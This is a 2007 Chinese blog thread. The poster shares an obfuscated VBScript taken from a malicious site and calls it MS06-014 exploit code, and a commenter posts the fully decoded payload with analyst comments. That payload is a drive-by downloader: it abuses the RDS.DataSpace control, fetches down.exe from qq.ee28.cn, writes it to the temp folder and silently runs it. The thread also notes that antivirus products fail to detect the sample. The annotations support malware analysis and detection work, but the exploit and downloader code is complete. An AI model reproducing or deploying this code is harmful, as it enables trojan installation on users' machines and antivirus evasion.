| 
	
	
		
			
		
				
						
								| Submitted by 云舒 on 2007, February 5, 6:22 AM. 
										
												技术 |  
								| 无意中发现一段VBS代码,觉得蛮好玩的,发这里保存一下: 
 代码:
 | <script language="VBScript">
 ' Outer (encoding) layer of the sample. S holds the real script as a hex string, and the
 ' short loop at the end rewrites that hex into a chain of CHR(&H..) terms appended to D,
 ' which is then passed to EXECUTE. The page source therefore never shows the payload in clear text.
 ' Decoder logic as written: while S has more than one character left, consume 2 hex digits
 ' when the next character is numeric, otherwise 4, and append C & digits & N to D.
 ' For analysis it is enough to hex-decode S as text (the decoded form is quoted later in
 ' this thread); nothing here has to be executed.
 ' NOTE(review): the string literal and the decoder statements are wrapped across lines
 ' (ISNUMERIC and LEFT are split mid-token). This looks like page rendering rather than the
 ' original layout, and commenters below report the listing did not run as posted.
 ' Detection note: commenters report that two AV products did not flag this sample, so
 ' matching the literal text is unreliable; the EXECUTE of a CHR()-built string and the
 ' behaviour of the decoded payload are the more stable signals.
 S="2020206F6E206572726F7220726573756D65206E6578740D0A737
 3733D226D64622E657865220D0A61613D226F62220D0A6161613D22
 6A65220D0A616161613D226374220D0A61616161613D22636C61220
 D0A6161616161613D2273736964220D0A616161616161613D22636C
 73220D0A61616161616161613D2269643A42443936220D0A6161616
 161616161613D22433535362D3635220D0A61616161616161616161
 3D2241332D313144220D0A61616161616161616161613D22302D393
 8220D0A6161616161616161616161613D2233412D30304330344622
 0D0A616161616161616161616161613D22433239453336220D0A6D6
 D3D224D6963220D0A6E6E3D22726F73220D0A6D6D6E6E3D226F6674
 2E58220D0A6E6E6D6D3D224D4C48220D0A6D6E6D6E3D22545450220
 D0A6E6D3D6D6E0D0A62623D224164220D0A6262623D226F64220D0A
 626262623D22622E5374220D0A62626262623D227265616D220D0A6
 7673D2267220D0A65653D2265220D0A74743D2274220D0A63633D22
 536372220D0A6363633D22697074220D0A636363633D22696E672E4
 6220D0A6363313D22696C6553220D0A636363313D22797374220D0A
 63636363313D22656D4F220D0A6363323D22626A220D0A636363323
 D22656374220D0A68683D22536865220D0A6868683D226C6C2E4170
 220D0A686868683D22706C69220D0A68686868683D2263617469220
 D0A6868686868683D226F6E220D0A6F6F3D226F220D0A6F6F6F3D227
 065220D0A6F6F6F6F3D226E220D0A536574207878787878787878203
 D20646F63756D656E742E637265617465456C656D656E7428616126
 6161612661616161290D0A78787878787878782E7365744174747269
 62757465206161616161266161616161612C20616161616161612661
 61616161616161266161616161616161612661616161616161616161
 26616161616161616161616126616161616161616161616161266161
 61616161616161616161610D0A53657420787878787878203D207878
 7878787878782E4372656174654F626A656374286D6D266E6E266D6
 D6E6E266E6E6D6D266D6E6D6E2C2222290D0A736574207878787820
 3D2078787878787878782E6372656174656F626A6563742862622662
 626226626262622662626262622C2222290D0A787878782E74797065
 203D20310D0A7878787878782E4F70656E2067672665652674742C20
 22687474703A2F2F71712E656532382E636E2F646F776E2F646F776E2
 E657865222C2046616C73650D0A7878787878782E53656E640D0A78
 7878787878783D7373730D0A20202020736574207878787878203D2
 078787878787878782E6372656174656F626A6563742863632663636
 32663636363266363312663636331266363636331266363322663636
 3322C2222290D0A2020202073657420746D70203D2078787878782E
 4765745370656369616C466F6C646572283229200D0A202020207878
 78787878783D2078787878782E4275696C645061746828746D702C7
 8787878787878290D0A20202020787878782E6F70656E0D0A2020202
 0787878782E7772697465207878787878782E726573706F6E7365426
 F64790D0A20202020787878782E73617665746F66696C65207878787
 87878782C320D0A20202020787878782E636C6F73650D0A20202020
 73657420717171203D2078787878787878782E6372656174656F626A
 65637428686826686868266868686826686868686826686868686868
 2C2222290D0A202020207171712E5368656C6C45786563757465207
 87878787878782C22222C22222C6F6F266F6F6F266F6F6F6F2C30":D
 ="EXECUTE """"":C="&CHR(&H":N=")":DO WHILE LEN(S)>1:IF ISNUMER
 IC(LEFT(S,1)) THEN D=D&C&LEFT(S,2)&N:S=MID(S,3) ELSE D=D&C&LEF
 T(S,4)&N:S=MID(S,5)
 LOOP:EXECUTE D
 
 </script>
 
 
 | 
 |  
								| 
 |   
      
        
          评论
        
      
      
         | 
 |  | 好像不能运行。汗 |  | Post by banroo on 2007, February 5, 7:55 AM 
 |  | 你运行了? 这个是刚从一个恶意网站抓出来的 MS06-014 的利用代码,如果没补丁会下载一个木马。
 |  | Post by 云舒 on 2007, February 5, 8:10 AM 
 |  | 呵呵~还双重加密呢~以为是老外的东西~原来是国产的~ 
 ' Decoded inner layer of the hex-encoded script above: a drive-by downloader that the
 ' poster identifies as MS06-014 exploit code captured from a malicious site. Per the
 ' poster, only unpatched systems end up downloading the trojan.
 ' Second obfuscation layer: every sensitive name (element name, classid, ProgIDs, verbs)
 ' is split into short fragments and joined with & at run time, so none of them appears
 ' as a whole string in the script text. Signatures have to match the reassembled values
 ' or the behaviour, not the fragments.
 ' Indicators visible in this listing: the clsid assembled below, the download URL in the
 ' Open call, and an executable named mdb.exe written to the temporary folder and launched.

 ' Suppress all runtime errors so a failed step never shows a script error to the user.
 on error resume next
 ' File name the downloaded binary is saved under.
 sss="mdb.exe"
 ' Fragments of "object", "classid" and the value
 ' "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" (the RDS.DataSpace control).
 aa="ob"
 aaa="je"
 aaaa="ct"
 aaaaa="cla"
 aaaaaa="ssid"
 aaaaaaa="cls"
 aaaaaaaa="id:BD96"
 aaaaaaaaa="C556-65"
 aaaaaaaaaa="A3-11D"
 aaaaaaaaaaa="0-98"
 aaaaaaaaaaaa="3A-00C04F"
 aaaaaaaaaaaaa="C29E36"
 ' Fragments of the ProgID "Microsoft.XMLHTTP" (HTTP client used for the download).
 mm="Mic"
 nn="ros"
 mmnn="oft.X"
 nnmm="MLH"
 mnmn="TTP"
 ' mn is never assigned and nm is never read again in this listing; the line has no effect.
 nm=mn
 ' Fragments of the ProgID "Adodb.Stream" (used to write the response body to disk).
 bb="Ad"
 bbb="od"
 bbbb="b.St"
 bbbbb="ream"
 ' Fragments of the HTTP verb "get".
 gg="g"
 ee="e"
 tt="t"
 ' Fragments of the ProgID "Scripting.FileSystemObject".
 cc="Scr"
 ccc="ipt"
 cccc="ing.F"
 cc1="ileS"
 ccc1="yst"
 cccc1="emO"
 cc2="bj"
 ccc2="ect"
 ' Fragments of the ProgID "Shell.Application".
 hh="She"
 hhh="ll.Ap"
 hhhh="pli"
 hhhhh="cati"
 hhhhhh="on"
 ' Fragments of the ShellExecute verb "open".
 oo="o"
 ooo="pe"
 oooo="n"
 ' Build an <object> element in the DOM and set its classid to the clsid assembled above.
 Set xxxxxxxx = document.createElement(aa&aaa&aaaa)
 ' NOTE(review): the setAttribute statement is split over two lines with no VBScript
 ' line-continuation character; this looks like a wrap introduced by the page - confirm
 ' against the hex-decoded original before relying on the listing's layout.
 xxxxxxxx.setAttribute aaaaa&aaaaaa,
aaaaaaa&aaaaaaaa&aaaaaaaaa&aaaaaaaaaa&aaaaaaaaaaa&aaaaaaaaaaaa&aaaaaaaaaaaaa
 ' All further objects are obtained through the control's own CreateObject method rather
 ' than the script engine's; presumably this is the behaviour the MS06-014 update addresses.
 Set xxxxxx = xxxxxxxx.CreateObject(mm&nn&mmnn&nnmm&mnmn,"")
 set xxxx = xxxxxxxx.createobject(bb&bbb&bbbb&bbbbb,"")
 ' Stream type 1 = binary data.
 xxxx.type = 1
 ' Synchronous (async = False) GET of the remote executable.
 xxxxxx.Open gg&ee&tt, "http://qq.ee28.cn/down/down.exe", False
 xxxxxx.Send
 ' Start the destination path from the bare file name.
 xxxxxxx=sss
 set xxxxx = xxxxxxxx.createobject(cc&ccc&cccc&cc1&ccc1&cccc1&cc2&ccc2,"")
 ' GetSpecialFolder(2) returns the temporary folder; the file name is joined onto it.
 set tmp = xxxxx.GetSpecialFolder(2)
 xxxxxxx= xxxxx.BuildPath(tmp,xxxxxxx)
 ' Write the HTTP response body to that path; save option 2 overwrites an existing file.
 xxxx.open
 xxxx.write xxxxxx.responseBody
 xxxx.savetofile xxxxxxx,2
 xxxx.close
 ' Launch the saved file with the "open" verb; the final argument 0 requests a hidden window.
 ' A browser process writing an executable to the temp folder and then starting it is the
 ' behaviour to alert on, independent of how the script text is encoded.
 set qqq = xxxxxxxx.createobject(hh&hhh&hhhh&hhhhh&hhhhhh,"")
 qqq.ShellExecute xxxxxxx,"","",oo&ooo&oooo,0
 |  | Post by 云舒姐姐 on 2007, February 5, 10:51 AM 
 |  | 哼!竟然敢取名字叫云舒姐姐!不想活了…… 
 当然好玩才贴出来的~nod32也不杀的,不知道卡巴如何。
 |  | Post by 云舒 on 2007, February 5, 2:09 PM 
 |  | 编这个的人,也蛮累的。解剖学学的好。哈。 |  | Post by 傲少 on 2007, February 6, 7:03 AM 
 |  | 呵呵,我是运行了。不过没有运行成功。 PS:我怕有问题,在虚拟机上照了张像后,才运行了。汗,白照了。
 |  | Post by banroo on 2007, February 6, 1:29 PM 
 |  | 我要学解密! |  | Post by banroo on 2007, February 6, 1:30 PM 
 |  | 脚本加密对付杀毒软件有意义,对于人来说一点意义也没有,解密太简单了。 
 混淆对于人来说是比较有效的方法。
 |  | Post by jno on 2007, February 11, 5:50 AM 
 |  | 德国的小红伞也不杀。。。没用卡巴测试。 |  | Post by lovewaz on 2007, May 15, 4:19 PM | 
     
	    
    
 |